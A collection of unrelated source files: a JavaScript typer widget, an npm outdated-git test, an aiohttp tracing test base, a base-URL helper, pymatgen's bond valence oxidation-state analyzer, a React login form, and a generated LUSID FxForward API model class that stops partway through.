if (this.on) {
this.element.style.opacity = "0";
this.on = false;
} else {
this.element.style.opacity = "1";
this.on = true;
}
}
function TyperSetup() {
var typers = {};
for (let e of document.getElementsByClassName("typer")) {
typers[e.id] = new Typer(e);
}
for (let e of document.getElementsByClassName("typer-stop")) {
let owner = typers[e.dataset.owner];
e.onclick = () => owner.stop();
}
for (let e of document.getElementsByClassName("typer-start")) {
let owner = typers[e.dataset.owner];
e.onclick = () => owner.start();
}
// for (let e of document.getElementsByClassName("cursor")) {
// let t = new Cursor(e);
// t.owner = typers[e.dataset.owner];
// t.owner.cursor = t;
// }
}
TyperSetup();
|
import shared from "../tile-g/shared-tile-g.native";
shared();
|
var common = require("../common-tap.js")
var test = require("tap").test
var npm = require("../../")
var mkdirp = require("mkdirp")
var rimraf = require("rimraf")
var mr = require("npm-registry-mock")
// config
var pkg = __dirname + "/outdated-git"
mkdirp.sync(pkg + "/cache")
test("dicovers new versions in outdated", function (t) {
process.chdir(pkg)
t.plan(5)
npm.load({cache: pkg + "/cache", registry: common.registry}, function () {
npm.commands.outdated([], function (er, d) {
t.equal('git', d[0][3])
t.equal('git', d[0][4])
t.equal('git://github.com/robertkowalski/foo-private.git', d[0][5])
t.equal('git://user:pass@github.com/robertkowalski/foo-private.git', d[1][5])
t.equal('git+https://github.com/robertkowalski/foo', d[2][5])
})
})
})
test("cleanup", function (t) {
rimraf.sync(pkg + "/cache")
t.end()
})
|
import asyncio
from aiohttp.test_utils import AioHTTPTestCase
from .app.web import setup_app
from ...base import BaseTracerTestCase
class TraceTestCase(BaseTracerTestCase, AioHTTPTestCase):
"""
Base class that provides a valid ``aiohttp`` application with
the async tracer.
"""
def enable_tracing(self):
pass
def disable_tracing(self):
pass
def tearDown(self):
# unpatch the aiohttp_jinja2 module
super(TraceTestCase, self).tearDown()
self.disable_tracing()
def get_app(self, loop=None):
"""
Override the get_app method to return the test application
"""
# aiohttp 2.0+ stores the loop instance in self.loop; for
# backward compatibility, we should expect a `loop` argument
loop = loop or self.loop
# create the app with the testing loop
self.app = setup_app(loop)
asyncio.set_event_loop(loop)
# trace the app
self.enable_tracing()
return self.app
|
export default function getBaseUrl() {
return getQueryStringParameterByName("useMockApi")
? "http://localhost:3001/"
: "https://mysterious-dawn-16770.herokuapp.com/";
}
function getQueryStringParameterByName(name, url) {
if (!url) url = window.location.href;
name = name.replace(/[[]]/g, "\\$&");
var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),
results = regex.exec(url);
if (!results) return null;
if (!results[2]) return "";
return decodeURIComponent(results[2].replace(/\+/g, " "));
}
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module implements classes to perform bond valence analyses.
"""
import collections
import functools
import operator
import os
from math import exp, sqrt
import numpy as np
from monty.serialization import loadfn
from pymatgen.core.periodic_table import Element, Species, get_el_sp
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
# Let's initialize some module level properties.
# List of electronegative elements specified in M. O'Keefe, & N. Brese,
# JACS, 1991, 113(9), 3226-3229. doi:10.1021/ja00009a002.
ELECTRONEG = [
Element(sym)
for sym in [
"H",
"B",
"C",
"Si",
"N",
"P",
"As",
"Sb",
"O",
"S",
"Se",
"Te",
"F",
"Cl",
"Br",
"I",
]
]
module_dir = os.path.dirname(os.path.abspath(__file__))
# Read in BV parameters.
BV_PARAMS = {}
for k, v in loadfn(os.path.join(module_dir, "bvparam_1991.yaml")).items():
BV_PARAMS[Element(k)] = v
# Read in yaml containing data-mined ICSD BV data.
all_data = loadfn(os.path.join(module_dir, "icsd_bv.yaml"))
ICSD_BV_DATA = {Species.from_string(sp): data for sp, data in all_data["bvsum"].items()}
PRIOR_PROB = {Species.from_string(sp): data for sp, data in all_data["occurrence"].items()}
def calculate_bv_sum(site, nn_list, scale_factor=1.0):
"""
Calculates the BV sum of a site.
Args:
site (PeriodicSite): The central site to calculate the bond valence
nn_list ([Neighbor]): A list of namedtuple Neighbors having "distance"
and "site" attributes
scale_factor (float): A scale factor to be applied. This is useful for
scaling distance, esp in the case of calculation-relaxed structures
which may tend to under (GGA) or over bind (LDA).
"""
el1 = Element(site.specie.symbol)
bvsum = 0
for nn in nn_list:
el2 = Element(nn.specie.symbol)
if (el1 in ELECTRONEG or el2 in ELECTRONEG) and el1 != el2:
r1 = BV_PARAMS[el1]["r"]
r2 = BV_PARAMS[el2]["r"]
c1 = BV_PARAMS[el1]["c"]
c2 = BV_PARAMS[el2]["c"]
R = r1 + r2 - r1 * r2 * (sqrt(c1) - sqrt(c2)) ** 2 / (c1 * r1 + c2 * r2)
vij = exp((R - nn.nn_distance * scale_factor) / 0.31)
bvsum += vij * (1 if el1.X < el2.X else -1)
return bvsum
def calculate_bv_sum_unordered(site, nn_list, scale_factor=1):
"""
Calculates the BV sum of a site for unordered structures.
Args:
site (PeriodicSite): The central site to calculate the bond valence
nn_list ([Neighbor]): A list of namedtuple Neighbors having "distance"
and "site" attributes
scale_factor (float): A scale factor to be applied. This is useful for
scaling distance, esp in the case of calculation-relaxed structures
which may tend to under (GGA) or over bind (LDA).
"""
# If the site "site" has N partial occupations as : f_{site}_0,
# f_{site}_1, ... f_{site}_N of elements
# X_{site}_0, X_{site}_1, ... X_{site}_N, and each neighbors nn_i in nn
# has N_{nn_i} partial occupations as :
# f_{nn_i}_0, f_{nn_i}_1, ..., f_{nn_i}_{N_{nn_i}}, then the bv sum of
# site "site" is obtained as :
# \sum_{nn} \sum_j^N \sum_k^{N_{nn}} f_{site}_j f_{nn_i}_k vij_full
# where vij_full is the valence bond of the fully occupied bond
bvsum = 0
for specie1, occu1 in site.species.items():
el1 = Element(specie1.symbol)
for nn in nn_list:
for specie2, occu2 in nn.species.items():
el2 = Element(specie2.symbol)
if (el1 in ELECTRONEG or el2 in ELECTRONEG) and el1 != el2:
r1 = BV_PARAMS[el1]["r"]
r2 = BV_PARAMS[el2]["r"]
c1 = BV_PARAMS[el1]["c"]
c2 = BV_PARAMS[el2]["c"]
R = r1 + r2 - r1 * r2 * (sqrt(c1) - sqrt(c2)) ** 2 / (c1 * r1 + c2 * r2)
vij = exp((R - nn.nn_distance * scale_factor) / 0.31)
bvsum += occu1 * occu2 * vij * (1 if el1.X < el2.X else -1)
return bvsum
class BVAnalyzer:
"""
This class implements a maximum a posteriori (MAP) estimation method to
determine oxidation states in a structure. The algorithm is as follows:
1) The bond valence sum of all symmetrically distinct sites in a structure
is calculated using the element-based parameters in M. O'Keefe, & N. Brese,
JACS, 1991, 113(9), 3226-3229. doi:10.1021/ja00009a002.
2) The posterior probabilities of all oxidation states is then calculated
using: P(oxi_state/BV) = K * P(BV/oxi_state) * P(oxi_state), where K is
a constant factor for each element. P(BV/oxi_state) is calculated as a
Gaussian with mean and std deviation determined from an analysis of
the ICSD. The posterior P(oxi_state) is determined from a frequency
analysis of the ICSD.
3) The oxidation states are then ranked in order of decreasing probability
and the oxidation state combination that result in a charge neutral cell
is selected.
"""
CHARGE_NEUTRALITY_TOLERANCE = 0.00001
def __init__(
self,
symm_tol=0.1,
max_radius=4,
max_permutations=100000,
distance_scale_factor=1.015,
charge_neutrality_tolerance=CHARGE_NEUTRALITY_TOLERANCE,
forbidden_species=None,
):
"""
Initializes the BV analyzer, with useful defaults.
Args:
symm_tol:
Symmetry tolerance used to determine which sites are
symmetrically equivalent. Set to 0 to turn off symmetry.
max_radius:
Maximum radius in Angstrom used to find nearest neighbors.
max_permutations:
The maximum number of permutations of oxidation states to test.
distance_scale_factor:
A scale factor to be applied. This is useful for scaling
distances, esp in the case of calculation-relaxed structures
which may tend to under (GGA) or over bind (LDA). The default
of 1.015 works for GGA. For experimental structure, set this to
1.
charge_neutrality_tolerance:
Tolerance on the charge neutrality when unordered structures
are at stake.
forbidden_species:
List of species that are forbidden (example : ["O-"] cannot be
used) It is used when e.g. someone knows that some oxidation
state cannot occur for some atom in a structure or list of
structures.
"""
self.symm_tol = symm_tol
self.max_radius = max_radius
self.max_permutations = max_permutations
self.dist_scale_factor = distance_scale_factor
self.charge_neutrality_tolerance = charge_neutrality_tolerance
forbidden_species = [get_el_sp(sp) for sp in forbidden_species] if forbidden_species else []
self.icsd_bv_data = (
{get_el_sp(specie): data for specie, data in ICSD_BV_DATA.items() if specie not in forbidden_species}
if len(forbidden_species) > 0
else ICSD_BV_DATA
)
def _calc_site_probabilities(self, site, nn):
el = site.specie.symbol
bv_sum = calculate_bv_sum(site, nn, scale_factor=self.dist_scale_factor)
prob = {}
for sp, data in self.icsd_bv_data.items():
if sp.symbol == el and sp.oxi_state != 0 and data["std"] > 0:
u = data["mean"]
sigma = data["std"]
# Calculate posterior probability. Note that constant
# factors are ignored. They have no effect on the results.
prob[sp.oxi_state] = exp(-((bv_sum - u) ** 2) / 2 / (sigma ** 2)) / sigma * PRIOR_PROB[sp]
# Normalize the probabilities
try:
prob = {k: v / sum(prob.values()) for k, v in prob.items()}
except ZeroDivisionError:
prob = {k: 0.0 for k in prob}
return prob
def _calc_site_probabilities_unordered(self, site, nn):
bv_sum = calculate_bv_sum_unordered(site, nn, scale_factor=self.dist_scale_factor)
prob = {}
for specie, occu in site.species.items():
el = specie.symbol
prob[el] = {}
for sp, data in self.icsd_bv_data.items():
if sp.symbol == el and sp.oxi_state != 0 and data["std"] > 0:
u = data["mean"]
sigma = data["std"]
# Calculate posterior probability. Note that constant
# factors are ignored. They have no effect on the results.
prob[el][sp.oxi_state] = exp(-((bv_sum - u) ** 2) / 2 / (sigma ** 2)) / sigma * PRIOR_PROB[sp]
# Normalize the probabilities
try:
prob[el] = {k: v / sum(prob[el].values()) for k, v in prob[el].items()}
except ZeroDivisionError:
prob[el] = {k: 0.0 for k in prob[el]}
return prob
def get_valences(self, structure):
"""
Returns a list of valences for the structure. This currently works only
for ordered structures only.
Args:
structure: Structure to analyze
Returns:
A list of valences for each site in the structure (for an ordered
structure), e.g., [1, 1, -2] or a list of lists with the
valences for each fractional element of each site in the
structure (for an unordered structure),
e.g., [[2, 4], [3], [-2], [-2], [-2]]
Raises:
A ValueError if the valences cannot be determined.
"""
els = [Element(el.symbol) for el in structure.composition.elements]
if not set(els).issubset(set(BV_PARAMS.keys())):
raise ValueError("Structure contains elements not in set of BV parameters!")
# Perform symmetry determination and get sites grouped by symmetry.
if self.symm_tol:
finder = SpacegroupAnalyzer(structure, self.symm_tol)
symm_structure = finder.get_symmetrized_structure()
equi_sites = symm_structure.equivalent_sites
else:
equi_sites = [[site] for site in structure]
# Sort the equivalent sites by decreasing electronegativity.
equi_sites = sorted(equi_sites, key=lambda sites: -sites[0].species.average_electroneg)
# Get a list of valences and probabilities for each symmetrically
# distinct site.
valences = []
all_prob = []
if structure.is_ordered:
for sites in equi_sites:
test_site = sites[0]
nn = structure.get_neighbors(test_site, self.max_radius)
prob = self._calc_site_probabilities(test_site, nn)
all_prob.append(prob)
val = list(prob.keys())
# Sort valences in order of decreasing probability.
val = sorted(val, key=lambda v: -prob[v])
# Retain probabilities that are at least 1/100 of highest prob.
valences.append(list(filter(lambda v: prob[v] > 0.01 * prob[val[0]], val)))
else:
full_all_prob = []
for sites in equi_sites:
test_site = sites[0]
nn = structure.get_neighbors(test_site, self.max_radius)
prob = self._calc_site_probabilities_unordered(test_site, nn)
all_prob.append(prob)
full_all_prob.extend(prob.values())
vals = []
for (elsp, occ) in get_z_ordered_elmap(test_site.species):
val = list(prob[elsp.symbol].keys())
# Sort valences in order of decreasing probability.
val = sorted(val, key=lambda v: -prob[elsp.symbol][v])
# Retain probabilities that are at least 1/100 of highest
# prob.
vals.append(
list(
filter(
lambda v: prob[elsp.symbol][v] > 0.001 * prob[elsp.symbol][val[0]],
val,
)
)
)
valences.append(vals)
# make variables needed for recursion
if structure.is_ordered:
nsites = np.array([len(i) for i in equi_sites])
vmin = np.array([min(i) for i in valences])
vmax = np.array([max(i) for i in valences])
self._n = 0
self._best_score = 0
self._best_vset = None
def evaluate_assignment(v_set):
el_oxi = collections.defaultdict(list)
for i, sites in enumerate(equi_sites):
el_oxi[sites[0].specie.symbol].append(v_set[i])
max_diff = max([max(v) - min(v) for v in el_oxi.values()])
if max_diff > 1:
return
score = functools.reduce(operator.mul, [all_prob[i][v] for i, v in enumerate(v_set)])
if score > self._best_score:
self._best_vset = v_set
self._best_score = score
def _recurse(assigned=[]):
# recurses to find permutations of valences based on whether a
# charge balanced assignment can still be found
if self._n > self.max_permutations:
return None
i = len(assigned)
highest = vmax.copy()
highest[:i] = assigned
highest *= nsites
highest = np.sum(highest)
lowest = vmin.copy()
lowest[:i] = assigned
lowest *= nsites
lowest = np.sum(lowest)
if highest < 0 or lowest > 0:
self._n += 1
return None
if i == len(valences):
evaluate_assignment(assigned)
self._n += 1
return None
for v in valences[i]:
new_assigned = list(assigned)
_recurse(new_assigned + [v])
return None
else:
nsites = np.array([len(i) for i in equi_sites])
tmp = []
attrib = []
for insite, nsite in enumerate(nsites):
for val in valences[insite]:
tmp.append(nsite)
attrib.append(insite)
new_nsites = np.array(tmp)
fractions = []
elements = []
for sites in equi_sites:
for sp, occu in get_z_ordered_elmap(sites[0].species):
elements.append(sp.symbol)
fractions.append(occu)
fractions = np.array(fractions, np.float_)
new_valences = []
for vals in valences:
for val in vals:
new_valences.append(val)
vmin = np.array([min(i) for i in new_valences], np.float_)
vmax = np.array([max(i) for i in new_valences], np.float_)
self._n = 0
self._best_score = 0
self._best_vset = None
def evaluate_assignment(v_set):
el_oxi = collections.defaultdict(list)
jj = 0
for i, sites in enumerate(equi_sites):
for specie, occu in get_z_ordered_elmap(sites[0].species):
el_oxi[specie.symbol].append(v_set[jj])
jj += 1
max_diff = max([max(v) - min(v) for v in el_oxi.values()])
if max_diff > 2:
return
score = functools.reduce(
operator.mul,
[all_prob[attrib[iv]][elements[iv]][vv] for iv, vv in enumerate(v_set)],
)
if score > self._best_score:
self._best_vset = v_set
self._best_score = score
def _recurse(assigned=[]):
# recurses to find permutations of valences based on whether a
# charge balanced assignment can still be found
if self._n > self.max_permutations:
return None
i = len(assigned)
highest = vmax.copy()
highest[:i] = assigned
highest *= new_nsites
highest *= fractions
highest = np.sum(highest)
lowest = vmin.copy()
lowest[:i] = assigned
lowest *= new_nsites
lowest *= fractions
lowest = np.sum(lowest)
if highest < -self.charge_neutrality_tolerance or lowest > self.charge_neutrality_tolerance:
self._n += 1
return None
if i == len(new_valences):
evaluate_assignment(assigned)
self._n += 1
return None
for v in new_valences[i]:
new_assigned = list(assigned)
_recurse(new_assigned + [v])
return None
_recurse()
if self._best_vset:
if structure.is_ordered:
assigned = {}
for val, sites in zip(self._best_vset, equi_sites):
for site in sites:
assigned[site] = val
return [int(assigned[site]) for site in structure]
assigned = {}
new_best_vset = []
for ii in range(len(equi_sites)):
new_best_vset.append(list())
for ival, val in enumerate(self._best_vset):
new_best_vset[attrib[ival]].append(val)
for val, sites in zip(new_best_vset, equi_sites):
for site in sites:
assigned[site] = val
return [[int(frac_site) for frac_site in assigned[site]] for site in structure]
raise ValueError("Valences cannot be assigned!")
def get_oxi_state_decorated_structure(self, structure):
"""
Get an oxidation state decorated structure. This currently works only
for ordered structures only.
Args:
structure: Structure to analyze
Returns:
A modified structure that is oxidation state decorated.
Raises:
ValueError if the valences cannot be determined.
"""
s = structure.copy()
if s.is_ordered:
valences = self.get_valences(s)
s.add_oxidation_state_by_site(valences)
else:
valences = self.get_valences(s)
s = add_oxidation_state_by_site_fraction(s, valences)
return s
def get_z_ordered_elmap(comp):
"""
Arbitrary ordered elmap on the elements/species of a composition of a
given site in an unordered structure. Returns a list of tuples (
element_or_specie: occupation) in the arbitrary order.
The arbitrary order is based on the Z of the element and the smallest
fractional occupations first.
Example : {"Ni3+": 0.2, "Ni4+": 0.2, "Cr3+": 0.15, "Zn2+": 0.34,
"Cr4+": 0.11} will yield the species in the following order :
Cr4+, Cr3+, Ni3+, Ni4+, Zn2+ ... or
Cr4+, Cr3+, Ni4+, Ni3+, Zn2+
"""
return sorted([(elsp, comp[elsp]) for elsp in comp.keys()])
def add_oxidation_state_by_site_fraction(structure, oxidation_states):
"""
Add oxidation states to a structure by fractional site.
Args:
oxidation_states (list): List of list of oxidation states for each
site fraction for each site.
E.g., [[2, 4], [3], [-2], [-2], [-2]]
"""
try:
for i, site in enumerate(structure):
new_sp = collections.defaultdict(float)
for j, (el, occu) in enumerate(get_z_ordered_elmap(site.species)):
specie = Species(el.symbol, oxidation_states[i][j])
new_sp[specie] += occu
structure[i] = new_sp
return structure
except IndexError:
raise ValueError("Oxidation state of all sites must be " "specified in the list.")
|
import React, { useContext, useState } from "react";
import { Alert, Button, Container, Form, Spinner } from "react-bootstrap";
import AuthService from "../../services/AuthService";
import { AuthContext } from "../../context/auth/AuthContext";
import { LoginFailed, LoginStart, LoginSuccess } from "../../context/auth/AuthActions";
export default function Login() {
const [email, setEmail] = useState("");
const [password, setPassword] = useState("");
const [error, setError] = useState(null);
const { isFetching, dispatch } = useContext(AuthContext);
const handleEmailChange = (e) => {
setEmail(e.target.value);
};
const handlePasswordChange = (e) => {
setPassword(e.target.value);
};
const handleSubmit = (e) => {
e.preventDefault();
dispatch(LoginStart());
const userCredentials = { email, password };
// Login, then get logged user and dispatch to reducer
AuthService.login(userCredentials)
.then((loginRes) => {
AuthService.getAuthUser()
.then((userRes) => {
dispatch(LoginSuccess(userRes.data));
})
.catch((err) => {
dispatch(LoginFailed());
console.log(err);
});
})
.catch((err) => {
dispatch(LoginFailed());
setPassword("");
setError(err.response.data.message);
});
};
return (
<section className="position-relative" style={{ height: "calc(100vh - 61.6px)" }}>
<Container className="col-8 col-md-6 col-lg-4 shadow-lg p-4 position-absolute start-50 top-50" style={{ transform: "translate(-50%, -50%)" }}>
<h3 className="text-center text-primary mb-4">Login</h3>
<Form onSubmit={handleSubmit}>
<Form.Group className="mb-4" controlId="formBasicEmail">
<Form.Control onChange={handleEmailChange} value={email} type="email" placeholder="Email" />
</Form.Group>
<Form.Group className="mb-4" controlId="formBasicPassword">
<Form.Control onChange={handlePasswordChange} value={password} type="password" placeholder="Password" />
</Form.Group>
{error && <Alert variant="danger">{error}</Alert>}
<Button disabled={isFetching} className="bg-primary" type="submit" style={{ width: "80px" }}>
{isFetching ? (
<Spinner size="sm" animation="border" role="status">
<span className="visually-hidden">Loading...</span>
</Spinner>
) : (
"Login"
)}
</Button>
</Form>
</Container>
</section>
);
}
|
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3192
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class FxForwardAllOf(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'start_date': 'datetime',
'maturity_date': 'datetime',
'dom_amount': 'float',
'dom_ccy': 'str',
'fgn_amount': 'float',
'fgn_ccy': 'str',
'ref_spot_rate': 'float',
'is_ndf': 'bool',
'fixing_date': 'datetime',
'instrument_type': 'str'
}
attribute_map = {
'start_date': 'startDate',
'maturity_date': 'maturityDate',
'dom_amount': 'domAmount',
'dom_ccy': 'domCcy',
'fgn_amount': 'fgnAmount',
'fgn_ccy': 'fgnCcy',
'ref_spot_rate': 'refSpotRate',
'is_ndf': 'isNdf',
'fixing_date': 'fixingDate',
'instrument_type': 'instrumentType'
}
required_map = {
'start_date': 'required',
'maturity_date': 'required',
'dom_amount': 'required',
'dom_ccy': 'required',
'fgn_amount': 'required',
'fgn_ccy': 'required',
'ref_spot_rate': 'optional',
'is_ndf': 'optional',
'fixing_date': 'optional',
'instrument_type': 'required'
}
def __init__(self, start_date=None, maturity_date=None, dom_amount=None, dom_ccy=None, fgn_amount=None, fgn_ccy=None, ref_spot_rate=None, is_ndf=None, fixing_date=None, instrument_type=None): # noqa: E501
"""
FxForwardAllOf - a model defined in OpenAPI
:param start_date: The start date of the instrument. This is normally synonymous with the trade-date. (required)
:type start_date: datetime
:param maturity_date: The final maturity date of the instrument. This means the last date on which the instruments makes a payment of any amount. For the avoidance of doubt, that is not necessarily prior to its last sensitivity date for the purposes of risk; e.g. instruments such as Constant Maturity Swaps (CMS) often have sensitivities to rates beyond their last payment date (required)
:type maturity_date: datetime
:param dom_amount: The amount that is to be paid in the domestic currency on the maturity date. (required)
:type dom_amount: float
:param dom_ccy: The domestic currency of the instrument. (required)
:type dom_ccy: str
:param fgn_amount: The amount that is to be paid in the foreign currency on the maturity date (required)
:type fgn_amount: float
:param fgn_ccy: The foreign (other) currency of the instrument. In the NDF case, only payments are made in the domestic currency. For the outright forward, currencies are exchanged. By domestic is then that of the portfolio. (required)
:type fgn_ccy: str
:param ref_spot_rate: The reference Fx Spot rate for currency pair Foreign-Domestic that was seen on the trade start date (time).
:type ref_spot_rate: float
:param is_ndf: Is the contract an Fx-Forward of \"Non-Deliverable\" type, meaning a single payment in the domestic currency based on the change in fx-rate vs a reference rate is used.
:type is_ndf: bool
:param fixing_date: The fixing date .
:type fixing_date: datetime
:param instrument_type: The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CashSettled, CdsIndex, Basket, FundingLeg, CrossCurrencySwap, FxSwap (required)
:type instrument_type: str
""" # noqa: E501
self._start_date = None
self._maturity_date = None
self._dom_amount = None
self._dom_ccy = None
self._fgn_amount = None
self._fgn_ccy = None
self._ref_spot_rate = None
self._is_ndf = None
self._fixing_date = None
self._instrument_type = None
self.discriminator = None
self.start_date = start_date
self.maturity_date = maturity_date
self.dom_amount = dom_amount
self.dom_ccy = dom_ccy
self.fgn_amount = fgn_amount
self.fgn_ccy = fgn_ccy
if ref_spot_rate is not None:
self.ref_spot_rate = ref_spot_rate
if is_ndf is not None:
self.is_ndf = is_ndf
if fixing_date is not None:
self.fixing_date = fixing_date
self.instrument_type = instrument_type
@property
def start_date(self):
"""Gets the start_date of this FxForwardAllOf. # noqa: E501
The start date of the instrument. This is normally synonymous with the trade-date. # noqa: E501
:return: The start_date of this FxForwardAllOf. # noqa: E501
:rtype: datetime
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this FxForwardAllOf.
The start date of the instrument. This is normally synonymous with the trade-date. # noqa: E501
:param start_date: The start_date of this FxForwardAllOf. # noqa: E501
:type: datetime
"""
if start_date is None:
raise ValueError("Invalid value for `start_date`, must not be `None`") # noqa: E501
self._start_date = start_date
@property
def maturity_date(self):
"""Gets the maturity_date of this FxForwardAllOf. # noqa: E501
The final maturity date of the instrument. This means the last date on which the instruments makes a payment of any amount. For the avoidance of doubt, that is not necessarily prior to its last sensitivity date for the purposes of risk; e.g. instruments such as Constant Maturity Swaps (CMS) often have sensitivities to rates beyond their last payment date # noqa: E501
:return: The maturity_date of this FxForwardAllOf. # noqa: E501
:rtype: datetime
"""
return self._maturity_date
@maturity_date.setter
def maturity_date(self, maturity_date):
"""Sets the maturity_date of this FxForwardAllOf.
The final maturity date of the instrument. This means the last date on which the instruments makes a payment of any amount. For the avoidance of doubt, that is not necessarily prior to its last sensitivity date for the purposes of risk; e.g. instruments such as Constant Maturity Swaps (CMS) often have sensitivities to rates beyond their last payment date # noqa: E501
:param maturity_date: The maturity_date of this FxForwardAllOf. # noqa: E501
:type: datetime
"""
if maturity_date is None:
raise ValueError("Invalid value for `maturity_date`, must not be `None`") # noqa: E501
self._maturity_date = maturity_date
@property
def dom_amount(self):
"""Gets the dom_amount of this FxForwardAllOf. # noqa: E501
The amount that is to be paid in the domestic currency on the maturity date. # noqa: E501
:return: The dom_amount of this FxForwardAllOf. # noqa: E501
:rtype: float
"""
return self._dom_amount
@dom_amount.setter
def dom_amount(self, dom_amount):
"""Sets the dom_amount of this FxForwardAllOf.
The amount that is to be paid in the domestic currency on the maturity date. # noqa: E501
:param dom_amount: The dom_amount of this FxForwardAllOf. # noqa: E501
:type: float
"""
if dom_amount is None:
raise ValueError("Invalid value for `dom_amount`, must not be `None`") # noqa: E501
self._dom_amount = dom_amount
@property
def dom_ccy(self):
"""Gets the dom_ccy of this FxForwardAllOf. # noqa: E501
The domestic currency of the instrument. # noqa: E501
:return: The dom_ccy of this FxForwardAllOf. # noqa: E501
:rtype: str
"""
return self._dom_ccy
@dom_ccy.setter
def dom_ccy(self, dom_ccy):
"""Sets the dom_ccy of this FxForwardAllOf.
The domestic currency of the instrument. # noqa: E501
:param dom_ccy: The dom_ccy of this FxForwardAllOf. # noqa: E501
:type: str
"""
if dom_ccy is None:
raise ValueError("Invalid value for `dom_ccy`, must not be `None`") # noqa: E501
self._dom_ccy = dom_ccy
@property
def fgn_amount(self):
"""Gets the fgn_amount of this FxForwardAllOf. # noqa: E501
The amount that is to be paid in the foreign currency on the maturity date # noqa: E501
:return: The fgn_amount of this FxForwardAllOf. # noqa: E501
:rtype: float
"""
return self._fgn_amount
@fgn_amount.setter
def fgn_amount(self, fgn_amount):
"""Sets the fgn_amount of this FxForwardAllOf.
The amount that is to be paid in the foreign currency on the maturity date # noqa: E501
:param fgn_amount: The fgn_amount of this FxForwardAllOf. # noqa: E501
:type: float
"""
if fgn_amount is None:
raise ValueError("Invalid value for `fgn_amount`, must not be `None`") # noqa: E501
self._fgn_amount = fgn_amount
@property
def fgn_ccy(self):
"""Gets the fgn_ccy of this FxForwardAllOf. # noqa: E501
The foreign (other) currency of the instrument. In the NDF case, only payments are made in the domestic currency. For the outright forward, currencies are exchanged. By domestic is then that of the portfolio. # noqa: E501
:return: The fgn_ccy of this FxForwardAllOf. # noqa: E501
:rtype: str
"""
return self._fgn_ccy
@fgn_ccy.setter
def fgn_ccy(self, fgn_ccy):
"""Sets the fgn_ccy of this FxForwardAllOf.
The foreign (other) currency of the instrument. In the NDF case, only payments are made in the domestic currency. For the outright forward, currencies are exchanged. By domestic is then that of the portfolio. # noqa: E501
:param fgn_ccy: The fgn_ccy of this FxForwardAllOf. # noqa: E501
:type: str
"""
if fgn_ccy is None:
raise ValueError("Invalid value for `fgn_ccy`, must not be `None`") # noqa: E501
self._fgn_ccy = fgn_ccy
@property
def ref_spot_rate(self):
"""Gets the ref_spot_rate of this FxForwardAllOf. # noqa: E501
The reference Fx Spot rate for currency pair Foreign-Domestic that was seen on the trade start date (time). # noqa: E501
:return: The ref_spot_rate of this FxForwardAllOf. # noqa: E501
:rtype: float
"""
return self._ref_spot_rate
@ref_spot_rate.setter
def ref_spot_rate(self, ref_spot_rate):
"""Sets the ref_spot_rate of this FxForwardAllOf.
The reference Fx Spot rate for currency pair Foreign-Domestic that was seen on the trade start date (time). # noqa: E501
:param ref_spot_rate: The ref_spot_rate of this FxForwardAllOf. # noqa: E501
:type: float
"""
self._ref_spot_rate = ref_spot_rate
@property
def is_ndf(self):
"""Gets the is_ndf of this FxForwardAllOf. # noqa: E501
Is the contract an Fx-Forward of \"Non-Deliverable\" type, meaning a single payment in the domestic currency based on the change in fx-rate vs a reference rate is used. # noqa: E501
:return: The is_ndf of this FxForwardAllOf. # noqa: E501
:rtype: bool
"""
return self._is_ndf
@is_ndf.setter
def is_ndf(self, is_ndf):
"""Sets the is_ndf of this FxForwardAllOf.
Is the contract an Fx-Forward of \"Non-Deliverable\" type, meaning a single payment in the domestic currency based on the change in fx-rate vs a reference rate is used. # noqa: E501
:param is_ndf: The is_ndf of this FxForwardAllOf. # noqa: E501
:type: bool
"""
self._is_ndf = is_ndf
@property
def fixing_date(self):
"""Gets the fixing_date of this FxForwardAllOf. # noqa: E501
The fixing date . # noqa: E501
:return: The fixing_date of this FxForwardAllOf. # noqa: E501
:rtype: datetime
"""
return self._fixing_date
@fixing_date.setter
def fixing_date(self, fixing_date):
"""Sets the fixing_date of this FxForwardAllOf.
The fixing date . # noqa: E501
:param fixing_date: The fixing_date of this FxForwardAllOf. # noqa: E501
:type: datetime
"""
self._fixing_date = fixing_date
@property
def instrument_type(self):
"""Gets the instrument_type of this FxForwardAllOf. # noqa: E501
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CashSettled, CdsIndex, Basket, FundingLeg, CrossCurrencySwap, FxSwap # noqa: E501
:return: The instrument_type of this FxForwardAllOf. # noqa: E501
:rtype: str
"""
return self._instrument_type
@instrument_type.setter
def instrument_type(self, instrument_type):
"""Sets the instrument_type of this FxForwardAllOf.
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CashSettled, CdsIndex, Basket, FundingLeg, CrossCurrencySwap, FxSwap # noqa: E501
:param instrument_type: The instrument_type of this FxForwardAllOf. # noqa: E501
:type: str
"""
if instrument_type is None:
raise ValueError("Invalid value for `instrument_type`, must not be `None`") # noqa: E501
